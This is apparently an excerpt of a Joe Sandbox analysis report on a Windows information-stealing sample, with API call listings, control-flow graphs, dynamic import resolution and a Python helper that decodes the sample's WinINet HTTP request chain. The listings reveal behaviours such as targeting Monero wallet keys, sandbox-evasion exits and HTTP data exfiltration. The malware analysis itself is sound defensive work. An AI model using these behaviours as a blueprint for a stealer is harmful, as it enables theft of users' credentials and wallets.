                          • Instruction Fuzzy Hash: 5412C972950118AADB15EBA0DCA2FEEB778BF64305F904199F14672091EF702F49CF62
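                          A triage helper, added here as an example; it is not part of the Joe Sandbox report and not code from the sample. It parses API listing lines in the report's rendered form (`Name.MODULE(args), ref: ADDR`, optionally prefixed with `Part of subcall function X:`), puts the WinINet calls of the function above back into address order (the listing prints HttpOpenRequestA after the InternetCloseHandle calls, but its ref 00124B15 sits between InternetConnectA and HttpSendRequestA), decodes the constant arguments against the documented wininet.h values, and summarises the GetProcAddress/LoadLibraryA resolver recorded further down the page by module handle. The sample lines are copied from this report's listings (a subset in the resolver case); the function and variable names are the example's own.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not report code).

Parses '• Name.MODULE(arg,...), ref: ADDR' lines, reorders the WinINet calls by
address, decodes their constant arguments and summarises an import resolver.
"""
import re
from collections import Counter

# Documented wininet.h constants (not taken from the report).
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER",
                    3: "INTERNET_SERVICE_HTTP"}
HTTP_OPEN_FLAGS = {
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x00000200: "INTERNET_FLAG_NO_UI",
    0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION", 0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE", 0x80000000: "INTERNET_FLAG_RELOAD",
}
WININET_STAGES = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                  "HttpSendRequestA", "InternetReadFile"]

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Sample input copied from this report's listings (subset for the resolver function).
HTTP_FUNCTION_APIS = r"""
• Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00124915
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00124ABA
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00124E18
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00124E49
• InternetCloseHandle.WININET(00000000), ref: 00124EAD
• InternetCloseHandle.WININET(00000000), ref: 00124EC5
• HttpOpenRequestA.WININET(00000000,00F0F8B0,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00124B15
• Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
• InternetCloseHandle.WININET(00000000), ref: 00124ECF
"""
RESOLVER_APIS = r"""
• GetProcAddress.KERNEL32(76210000,00EF5810), ref: 00139C2D
• GetProcAddress.KERNEL32(76210000,00EF5850), ref: 00139C45
• GetProcAddress.KERNEL32(76210000,00F09B60), ref: 00139C5E
• LoadLibraryA.KERNEL32(00F0D7C0,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A03D
• LoadLibraryA.KERNEL32(00F0D8F8,?,00135CA3,00140AEB,?,?,?,?,?,?,?,?,?,?,00140AEA,00140AE3), ref: 0013A04E
• GetProcAddress.KERNEL32(751E0000,00EF59F0), ref: 0013A0DA
• GetProcAddress.KERNEL32(751E0000,00F0DB20), ref: 0013A0F2
"""


def parse_api_lines(text):
    """One dict per parsable line; headers and blank lines are skipped."""
    recs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        recs.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                     "ref": int(m.group("ref"), 16), "subcall": m.group("sub")})
    return recs


def decode_flags(value, table):
    """Names of the set bits, plus any residue the table does not cover."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    residue = value & ~sum(table)
    return names + ([hex(residue)] if residue else [])


def wininet_chain(recs):
    """Direct (non-subcall) WinINet calls in address order as (api, ref, note)."""
    calls = sorted((r for r in recs if r["module"] == "WININET" and r["subcall"] is None),
                   key=lambda r: r["ref"])
    out = []
    for r in calls:
        a, note = r["args"], ""
        try:
            if r["api"] == "InternetOpenA":             # dwAccessType
                note = INTERNET_OPEN_TYPE.get(int(a[1], 16), "?")
            elif r["api"] == "InternetConnectA":        # dwService
                note = INTERNET_SERVICE.get(int(a[5], 16), "?")
            elif r["api"] == "HttpOpenRequestA":        # dwFlags
                note = "|".join(decode_flags(int(a[6], 16), HTTP_OPEN_FLAGS))
            elif r["api"] == "InternetReadFile":        # dwNumberOfBytesToRead
                note = "%d-byte buffer" % int(a[2], 16)
        except (IndexError, ValueError):                # '?' placeholders in the listing
            note = "?"
        out.append((r["api"], r["ref"], note))
    return out


def is_http_exfil_chain(recs):
    """True when open -> connect -> request -> send -> read all occur, in that order."""
    seen = [api for api, _, _ in wininet_chain(recs)]
    pos = [seen.index(s) for s in WININET_STAGES if s in seen]
    return len(pos) == len(WININET_STAGES) and pos == sorted(pos)


def resolver_summary(recs):
    """GetProcAddress calls per module handle (first argument) and LoadLibraryA count."""
    per_module = Counter(r["args"][0] for r in recs if r["api"] == "GetProcAddress" and r["args"])
    loads = sum(1 for r in recs if r["api"] == "LoadLibraryA")
    return {"getprocaddress_by_module": dict(per_module), "loadlibrary_calls": loads,
            "total_getprocaddress": sum(per_module.values())}


if __name__ == "__main__":
    http = parse_api_lines(HTTP_FUNCTION_APIS)
    for api, ref, note in wininet_chain(http):
        print("%08X  %-20s %s" % (ref, api, note))
    print("complete WinINet request chain:", is_http_exfil_chain(http))
    print(resolver_summary(parse_api_lines(RESOLVER_APIS)))
```

                          Run stand-alone it prints the request chain in address order: InternetOpenA with INTERNET_OPEN_TYPE_DIRECT (no proxy), InternetConnectA with INTERNET_SERVICE_HTTP, HttpOpenRequestA with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE (the 00400100 argument above), and InternetReadFile into a 1999-byte (0x7CF) buffer. The `"` and `------` entries in this record's String ID are consistent with the request body being assembled as a multipart/form-data POST, though the report does not show the body itself. Run the same parser over the full GetProcAddress listing further down to get the per-module resolution counts for the sample's dynamic import table.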
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                          • Instruction ID: b32a5893357df11d5925120855b5bdad4d0e6cfad7d19e167cb3c7a574d79a64
                          • Opcode Fuzzy Hash: 399c71933edbd140ba14f72431dc21d4cb126b15e8824d0692d6d83db27a3b33
                          • Instruction Fuzzy Hash: 21F04FB1944609ABCB14DF98DD49BAEFBBCEB09711F10425AFA05A3680C7B415048FA1
                          APIs
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                          • Instruction ID: 9c286f9793f08283c77209842a7084fcab405134633cee892b3670e25b5aea26
                          • Opcode Fuzzy Hash: 04f65bd14870b73c61d96c0072eddc4cd755a6bf99a42fe015abb25ed711ac8b
                          • Instruction Fuzzy Hash: 78D05E7490030CDBCB00DFE0D84A6EDBB7CFB08312F000554DD0572340EB709491CAA6

                          Control-flow Graph
                          control_flow_graph (one basic block per line: id, address range, calls -> successors)
                          • 633 139c10-139c1a -> 634, 635
                          • 634 139c20-13a031: GetProcAddress * 43 -> 635
                          • 635 13a036-13a0ca: LoadLibraryA * 8 -> 636, 637
                          • 636 13a146-13a14d -> 638, 639
                          • 637 13a0cc-13a141: GetProcAddress * 5 -> 636
                          • 638 13a153-13a211: GetProcAddress * 8 -> 639
                          • 639 13a216-13a21d -> 640, 641
                          • 640 13a298-13a29f -> 642, 643
                          • 641 13a21f-13a293: GetProcAddress * 5 -> 640
                          • 642 13a337-13a33e -> 644, 645
                          • 643 13a2a5-13a332: GetProcAddress * 6 -> 642
                          • 644 13a344-13a41a: GetProcAddress * 9 -> 645
                          • 645 13a41f-13a426 -> 646, 647
                          • 646 13a4a2-13a4a9 -> 648, 649
                          • 647 13a428-13a49d: GetProcAddress * 5 -> 646
                          • 648 13a4ab-13a4d7: GetProcAddress * 2 -> 649
                          • 649 13a4dc-13a4e3 -> 650, 651
                          • 650 13a515-13a51c -> 652, 653
                          • 651 13a4e5-13a510: GetProcAddress * 2 -> 650
                          • 652 13a612-13a619 -> 654, 655
                          • 653 13a522-13a60d: GetProcAddress * 10 -> 652
                          • 654 13a61b-13a678: GetProcAddress * 4 -> 655
                          • 655 13a67d-13a684 -> 656, 657
                          • 656 13a686-13a699: GetProcAddress -> 657
                          • 657 13a69e-13a6a5 -> 658, 659
                          • 658 13a6a7-13a703: GetProcAddress * 4 -> 659
                          • 659 13a708-13a709 -> (no successors)
                          APIs
                          • GetProcAddress.KERNEL32(76210000,00EF5810), ref: 00139C2D
                          • GetProcAddress.KERNEL32(76210000,00EF5850), ref: 00139C45
                          • GetProcAddress.KERNEL32(76210000,00F09B60), ref: 00139C5E
                          • GetProcAddress.KERNEL32(76210000,00F09BC0), ref: 00139C76
                          • GetProcAddress.KERNEL32(76210000,00F09BD8), ref: 00139C8E
                          • GetProcAddress.KERNEL32(76210000,00F0D880), ref: 00139CA7
                          • GetProcAddress.KERNEL32(76210000,00EFAE70), ref: 00139CBF
                          • GetProcAddress.KERNEL32(76210000,00F0D988), ref: 00139CD7
                          • GetProcAddress.KERNEL32(76210000,00F0D820), ref: 00139CF0
                          • GetProcAddress.KERNEL32(76210000,00F0D940), ref: 00139D08
                          • GetProcAddress.KERNEL32(76210000,00F0DA00), ref: 00139D20
                          • GetProcAddress.KERNEL32(76210000,00EF5A90), ref: 00139D39
                          • GetProcAddress.KERNEL32(76210000,00EF5870), ref: 00139D51
                          • GetProcAddress.KERNEL32(76210000,00EF5890), ref: 00139D69
                          • GetProcAddress.KERNEL32(76210000,00EF58B0), ref: 00139D82
                          • GetProcAddress.KERNEL32(76210000,00F0D7F0), ref: 00139D9A
                          • GetProcAddress.KERNEL32(76210000,00F0DA90), ref: 00139DB2
                          • GetProcAddress.KERNEL32(76210000,00EFABA0), ref: 00139DCB
                          • GetProcAddress.KERNEL32(76210000,00EF5A30), ref: 00139DE3
                          • GetProcAddress.KERNEL32(76210000,00F0D928), ref: 00139DFB
                          • GetProcAddress.KERNEL32(76210000,00F0D808), ref: 00139E14
                          • GetProcAddress.KERNEL32(76210000,00F0D7A8), ref: 00139E2C
                          • GetProcAddress.KERNEL32(76210000,00F0D9B8), ref: 00139E44
                          • GetProcAddress.KERNEL32(76210000,00EF58D0), ref: 00139E5D
                          • GetProcAddress.KERNEL32(76210000,00F0D850), ref: 00139E75
                          • GetProcAddress.KERNEL32(76210000,00F0DA78), ref: 00139E8D
                          • GetProcAddress.KERNEL32(76210000,00F0D898), ref: 00139EA6
                          • GetProcAddress.KERNEL32(76210000,00F0D8B0), ref: 00139EBE
                          • GetProcAddress.KERNEL32(76210000,00F0D9A0), ref: 00139ED6
                          • GetProcAddress.KERNEL32(76210000,00F0D9D0), ref: 00139EEF
                          • GetProcAddress.KERNEL32(76210000,00F0D9E8), ref: 00139F07
                          • GetProcAddress.KERNEL32(76210000,00F0D970), ref: 00139F1F
                          • GetProcAddress.KERNEL32(76210000,00F0DA18), ref: 00139F38
                          • GetProcAddress.KERNEL32(76210000,00F00508), ref: 00139F50
                          • GetProcAddress.KERNEL32(76210000,00F0D8C8), ref: 00139F68
                          • GetProcAddress.KERNEL32(76210000,00F0D958), ref: 00139F81
                          • GetProcAddress.KERNEL32(76210000,00EF5910), ref: 00139F99
                          • GetProcAddress.KERNEL32(76210000,00F0DA30), ref: 00139FB1
                          • GetProcAddress.KERNEL32(76210000,00EF59D0), ref: 00139FCA
                          • GetProcAddress.KERNEL32(76210000,00F0DA48), ref: 00139FE2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 0Z$0[$0\$0]$HttpQueryInfoA$InternetSetOptionA$PX$PY$P[$P\$P]$pX$p[$p\$p]
                          • API String ID: 2238633743-2409266022

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                          • HttpOpenRequestA.WININET(00000000,GET,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00126385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001263FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0012646D
                          • InternetCloseHandle.WININET(00000000), ref: 001264EF
                          • InternetCloseHandle.WININET(00000000), ref: 001264F9
                          • InternetCloseHandle.WININET(00000000), ref: 00126503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                            • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001356A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135857
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 001352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135318
                            • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 0013532F
                            • Part of subcall function 001352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00135364
                            • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 00135383
                            • Part of subcall function 001352C0: lstrlen.KERNEL32(00000000), ref: 001353AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0013578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00135940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00135A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934

                          Control-flow Graph

                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 001317C5
                          • ExitProcess.KERNEL32 ref: 001317D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458

                          Control-flow Graph

                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00137542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0013757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0013760A
                          • wsprintfA.USER32 ref: 00137640
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 001211D0: ExitProcess.KERNEL32 ref: 00121211
                            • Part of subcall function 00121160: GetSystemInfo.KERNEL32(?), ref: 0012116A
                            • Part of subcall function 00121160: ExitProcess.KERNEL32 ref: 0012117E
                            • Part of subcall function 00121110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                            • Part of subcall function 00121110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                            • Part of subcall function 00121110: ExitProcess.KERNEL32 ref: 00121143
                            • Part of subcall function 00121220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                            • Part of subcall function 00121220: ExitProcess.KERNEL32 ref: 00121294
                            • Part of subcall function 00136770: GetUserDefaultLangID.KERNEL32 ref: 00136774
                            • Part of subcall function 00121190: ExitProcess.KERNEL32 ref: 001211C6
                            • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                            • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                            • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                            • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                            • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                            • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                          • Sleep.KERNEL32(00001770), ref: 00136B04
                          • CloseHandle.KERNEL32(?,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                          • ExitProcess.KERNEL32 ref: 00136B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                          • Instruction ID: 3383cd6d65cac6920b2869dbf17842652e12575b2241996106d8b56cf6132163
                          • Opcode Fuzzy Hash: e40e7268f7035c3b20318134e1674e3621ae596cf9283633cb49a53ef8abf238
                          • Instruction Fuzzy Hash: FB312C71940208BBDB05FBF0DC56BEE7778AF24700F908518F252B6192DFB06A05CBA2

                           Control-flow Graph (graph image not rendered; legend: Executed / Not Executed)
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00136AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00136AF9
                          • Sleep.KERNEL32(00001770), ref: 00136B04
                          • CloseHandle.KERNEL32(?,00000000,?,00F099A8,?,0014110C,?,00000000,?,00141110,?,00000000,00140AEF), ref: 00136B1A
                          • ExitProcess.KERNEL32 ref: 00136B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                          • Instruction ID: a5596bbc9c0339a73978337f60cf2fa5bb22aa0307e1a7ee3d63dda9ebe7cdef
                          • Opcode Fuzzy Hash: a742b5645727437cde0d43c0227ec0c295b8649f2a6a5e99fd5a9153ee2a599e
                          • Instruction Fuzzy Hash: 7DF0D470A40219BBE711ABA0DC1ABBEBA78EB14701F10C914F513A61D5DBF05540EAA6

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: f20ea9da08eaa489956a5a13b7fb8123f51301c86b5865823a4a9277baadca93
                          • Instruction ID: 135e6b6e107f05b352a03380494ddc63b372b4813295bad8482903da554fb2f5
